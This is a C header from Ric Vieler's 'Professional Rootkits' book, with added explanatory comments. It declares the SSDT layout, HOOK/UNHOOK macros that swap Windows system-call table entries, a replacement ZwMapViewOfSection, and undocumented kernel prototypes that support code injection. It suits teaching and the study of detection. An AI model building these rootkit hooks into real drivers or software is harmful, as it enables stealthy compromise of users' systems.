hookManager.h


The file hookManager.h has been expanded with additional function prototypes, data structures, and definitions, and now declares the renamed HookKernel function:

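  // Copyright Ric Vieler, 2006
// Support header for hookManager.c
//
// Declares what hookManager.c shares with the rest of the driver: the
// layout of the kernel's System Service Descriptor Table (SSDT), the
// HOOK/UNHOOK macros that swap entries in the driver's private copy of the
// service table, the replacement/original pointers for the hooked
// services, and the undocumented Zw* prototypes the driver links against.
//
// Everything here is written for 32-bit x86 (XP-era) kernels: the index
// extraction in HOOK_INDEX, the LONG-sized exchanges in HOOK/UNHOOK and
// the KeServiceDescriptorTable import all depend on that. On x64 the
// symbol is not exported and Kernel Patch Protection bug-checks on SSDT
// modification, so none of this carries over.
#ifndef HOOK_MANAGER_H
#define HOOK_MANAGER_H

// Installs the hooks into NewSystemCallTable; defined in hookManager.c.
// Returns an NTSTATUS (success/failure code convention is hookManager.c's).
NTSTATUS HookKernel( void );

// Compares a short (8.3-style) and a long form of a file name for
// equality. NOTE(review): behaviour inferred from the parameter names —
// confirm against hookManager.c.
BOOL IsSameFile( PUNICODE_STRING shortString, PUNICODE_STRING longString );

// Resolves an address the import linker could not bind (see the
// ZwProtectVirtualMemory note below). Presumably returns NULL on failure —
// confirm against hookManager.c.
PVOID findUnresolved( PVOID pFunc );

// Byte-wise comparison of 'size' bytes at pattern1 and pattern2.
// The return convention (0 on match or non-zero on match) is set by
// hookManager.c — check before relying on it.
int checkPattern( unsigned char* pattern1, unsigned char* pattern2, size_t size );

// Looks up lpFunctionName in the image loaded at BaseAddress; 'pattern' /
// patternLength presumably validate the first bytes of the located function
// (see checkPattern). Returns the address, or NULL — confirm in hookManager.c.
PVOID GetFunctionAddress( PVOID BaseAddress,
                          char* lpFunctionName,
                          PBYTE pattern,
                          size_t patternLength );

// The kernel's Service Descriptor Table.
// Packed so the struct mirrors the in-memory layout of the exported
// KeServiceDescriptorTable on 32-bit kernels (pack(1) makes no difference
// there, since all members are 4 bytes, but it documents the intent).
#pragma pack(1)
typedef struct ServiceDescriptorEntry {
    unsigned int *ServiceTableBase;         // array of system-service entry points
    unsigned int *ServiceCounterTableBase;  // per-service call counters (checked builds)
    unsigned int NumberOfServices;          // number of entries in ServiceTableBase
    unsigned char *ParamTableBase;          // per-service argument byte counts
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()

// Exported by ntoskrnl on x86 kernels only.
__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;

// Our System Call Table: the driver's writable copy of ServiceTableBase,
// allocated and mapped by hookManager.c.
extern PVOID* NewSystemCallTable;

// Our Memory Descriptor List: describes the mapping behind NewSystemCallTable.
extern PMDL pMyMDL;

// Needed for data injection
extern PVOID kernel32Base;

// Needed for version differences (presumably filled from PsGetVersion —
// confirm in hookManager.c).
extern ULONG majorVersion;
extern ULONG minorVersion;

// SSDT slot of a system service, read straight out of its Zw* stub.
// On x86 every Zw* stub starts with "mov eax, <service index>", so the
// ULONG at offset 1 is the index. This is an unaligned, type-punned read
// and is x86-only; it is also the reason the header cannot be used on x64.
#define HOOK_INDEX(functionName) (*(PULONG)((PUCHAR)(functionName) + 1))

// Atomically replace the slot for functionName in NewSystemCallTable with
// newPointer2Function, storing the previous entry in oldPointer2Function
// (which must later be forwarded to and used by UNHOOK).
// NOTE(review): the LONG/PLONG casts assume sizeof(PVOID) == sizeof(LONG);
// on a 64-bit build they would truncate the pointer. Kept as written
// because the rest of the header is x86-only anyway.
// Defender's note: an SSDT entry pointing outside ntoskrnl/win32k is the
// classic indicator this technique leaves behind.
#define HOOK(functionName, newPointer2Function, oldPointer2Function )  \
    (oldPointer2Function) = (PVOID) InterlockedExchange( \
        (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) (newPointer2Function))

// Atomically restore the original entry saved by HOOK.
#define UNHOOK(functionName, oldPointer2Function)  \
    InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) (oldPointer2Function))

// Pointer type for the original ZwMapViewOfSection entry.
typedef NTSTATUS (*ZWMAPVIEWOFSECTION)(
    IN HANDLE SectionHandle,
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN ULONG ZeroBits,
    IN ULONG CommitSize,
    IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
    IN OUT PSIZE_T ViewSize,
    IN SECTION_INHERIT InheritDisposition,
    IN ULONG AllocationType,
    IN ULONG Protect );

// Original entry saved by HOOK(ZwMapViewOfSection, ...); the replacement
// below forwards to it.
extern ZWMAPVIEWOFSECTION OldZwMapViewOfSection;

// Replacement installed in NewSystemCallTable; defined in hookManager.c.
// Same contract as ZwMapViewOfSection.
NTSTATUS NewZwMapViewOfSection(
    IN HANDLE SectionHandle,
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN ULONG ZeroBits,
    IN ULONG CommitSize,
    IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
    IN OUT PSIZE_T ViewSize,
    IN SECTION_INHERIT InheritDisposition,
    IN ULONG AllocationType,
    IN ULONG Protect );

// UNDOCUMENTED
// Prototypes not provided by the DDK headers of the time; the parameter
// types are the book's, not the official ones.
NTSYSAPI NTSTATUS NTAPI ZwCreateSection(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    IN PLARGE_INTEGER MaximumSize OPTIONAL,
    IN ULONG SectionPageProtection,
    IN ULONG AllocationAttributes,
    IN HANDLE FileHandle OPTIONAL );

// NOTE(review): the documented form takes PSIZE_T RegionSize; identical
// width on x86, so this declaration is only correct for 32-bit builds.
NTSYSAPI NTSTATUS NTAPI ZwAllocateVirtualMemory(
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN ULONG ZeroBits,
    IN OUT PULONG RegionSize,
    IN ULONG AllocationType,
    IN ULONG Protect );

// ZwProtectVirtualMemory won't resolve!
// Need to extract from dll manually.
// ZwPulseEvent is declared here for hookManager.c; it is not used by any
// macro in this header. The parameter names/types are the book's, not the
// documented signature — confirm before calling it directly.
NTSYSAPI NTSTATUS NTAPI ZwPulseEvent( HANDLE h, PULONG p );

NTSYSAPI NTSTATUS NTAPI ZwProtectVirtualMemory(
    IN HANDLE               ProcessHandle,
    IN OUT PVOID            *BaseAddress,
    IN OUT PULONG           NumberOfBytesToProtect,
    IN ULONG                NewAccessProtection,
    OUT PULONG              OldAccessProtection );

// Pointer type for the ZwProtectVirtualMemory entry located at runtime.
typedef NTSTATUS (*ZWPROTECTVIRTUALMEMORY)(
    IN HANDLE               ProcessHandle,
    IN OUT PVOID            *BaseAddress,
    IN OUT PULONG           NumberOfBytesToProtect,
    IN ULONG                NewAccessProtection,
    OUT PULONG              OldAccessProtection );

// Filled in by hookManager.c (see findUnresolved / GetFunctionAddress).
extern ZWPROTECTVIRTUALMEMORY OldZwProtectVirtualMemory;

// Undocumented object types
extern POBJECT_TYPE* MmSectionObjectType;
extern POBJECT_TYPE* PsProcessType;

// Object-attribute flags; same values as the public ntdef.h definitions,
// repeated here because the DDK headers used by the book do not expose them.
#define OBJ_INHERIT          0x00000002L
#define OBJ_PERMANENT        0x00000010L
#define OBJ_EXCLUSIVE        0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF           0x00000080L
#define OBJ_OPENLINK         0x00000100L
#define OBJ_KERNEL_HANDLE    0x00000200L

#endif /* HOOK_MANAGER_H */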




Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler

